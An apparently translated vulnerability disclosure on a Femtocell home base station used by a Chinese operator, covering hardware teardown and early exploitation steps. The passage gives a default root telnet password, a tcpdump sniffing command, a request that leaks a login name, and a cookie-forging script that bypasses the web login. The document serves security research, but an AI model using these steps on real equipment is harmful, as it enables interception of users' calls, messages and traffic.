The Ali Mobile Security team, together with experts from the wireless communication technology department of China's Taier Laboratory, carried out a security analysis of a Femtocell base station model used by a domestic operator and found several major vulnerabilities that allow a user's SMS messages, calls and data traffic to be eavesdropped on. A malicious attacker could apply for a Femtocell device free of charge and quickly turn it into a fake base station controller for bulk SMS and a traffic sniffer, affecting the communication security of the public.

A home base station (Femtocell, also called a "fly cell"; femto means 10^-15) is an IP-based micro base station that operators introduced to solve indoor coverage problems. It is typically deployed in the user's home, sometimes placed directly on a desk. Now that operator network construction is largely complete and the number of macro stations is no longer growing, the Femtocell has become the most effective means of filling coverage blind spots during the network optimisation stage, and operators favour it. The Femtocell connects directly to the operator's core network over IP, and from the user's side it is completely legitimate base station equipment. It is installed where users can physically reach it, so the traditional telecom vendors, who have always sheltered behind the natural physical security barrier of the locked equipment room, finally have to submit their work to review by the world's hackers. Traditional telecom vendors, however, have developed little security awareness, and security vulnerabilities in their communication equipment are plentiful. In recent years the BlackHat and DEFCON security conferences have repeatedly exposed Femtocell security issues.
The vulnerability details were reported to the relevant operator on 21 May 2015. The manufacturer has since carried out emergency repairs on the affected equipment across the whole network, and the vulnerabilities have now been fixed. To advance security research, the details are now being made public.

1 Board overview

1.1 Obtaining the device

How do you get a Femtocell device? At the beginning of April 2015 I called 10086 (the operator's customer service hotline) to report that the signal at home was poor (it really was). 10086 said that if the household has broadband, a small base station can be installed free of charge. Two days later an installation engineer came to install it.

(image)

The typical installation location of a Femtocell is shown below:

(image)

The maximum transmit power is 30 dBm, only 1 W, whereas an ordinary GSM base station transmits around 20 W. After the Femtocell was installed the effect was indeed very good. Previously there was only a weak indoor GSM signal, occasionally "no signal", and phone calls in the house often could not get through. With the Femtocell turned on, the signal jumps to full bars, although the data standard is GPRS. Anyone with no signal at home can call 10086 and apply; the application is free. According to the operator, 3G and 4G Femtocells are being prepared as well. Compared with a repeater, which needs both an outdoor and an indoor antenna to be installed, a Femtocell is much more stable and easier to set up.

In October 2014 someone submitted a Femtocell vulnerability to the WooYun platform. According to the record, the fix was completed in January 2015 and the vulnerability was disclosed. That report inspired us to continue the security analysis of Femtocell devices. We found some new holes, and the old bug had not been fixed completely either.

1.1 Hardware composition

Opening the case reveals two circuit boards connected by a custom cable; an initial guess is that the cable carries at least the four wires of an Ethernet connection.
One board is an ordinary WLAN access point with an Atheros SoC, no different from a typical home router.

(image)

The other is the RF board, consisting mainly of three components:

- TI OMAPL138B 345 MHz DSP+ARM processor
- Cyclone FPGA
- AD9365 RF agile controller (lower left corner)

(image)

1.2 Network topology

(image)

2 WLAN board penetration

2.1 Weak root password

You can log in directly over telnet and get a Linux shell with root access:

    $ telnet 192.168.197.1
    login: root
    password: 5up

Incidentally, this password appears to be the default of the Atheros PB44 reference design board, and many manufacturers never change it. Searching the web for "5up" together with "root" turns up plenty of interesting results. The busybox on the device is essentially uncropped and even includes tcpdump, so all traffic on this WiFi network can be captured directly:

    busybox tcpdump -i br0 not port 23

2.2 Other uses

/mnt/flash/nvm/femtoOamStore.db is a SQLite3 file that can be viewed directly with sqlitebrowser. The LEDs can be toggled with /mnt/flash/led_ctrl.sh [on|off].

3 RF board penetration

3.1 Web login bypass

Request http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser to obtain the user name abmoc@24320. USER.js shows that the original login bypass problem has not been fixed; open the browser console and enter the following script to log in:

    SetCookie('role', 'marketUser');
    SetCookie('username', 'abmoc@24320');
    SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
    document.cookie = "loginFlag=1;";
    window.top.location = 'main.asp?r=' + Math.random() + '#index';

After logging in, we have exactly the same operating permissions as the engineers the operator sends to commission the station! Some screenshots of the management interface:

(image)
(image)
(image)
However, the code for the previously exposed file upload and download interface, as well as the interface for sending welcome SMS messages, has been completely deleted! But is it really deleted?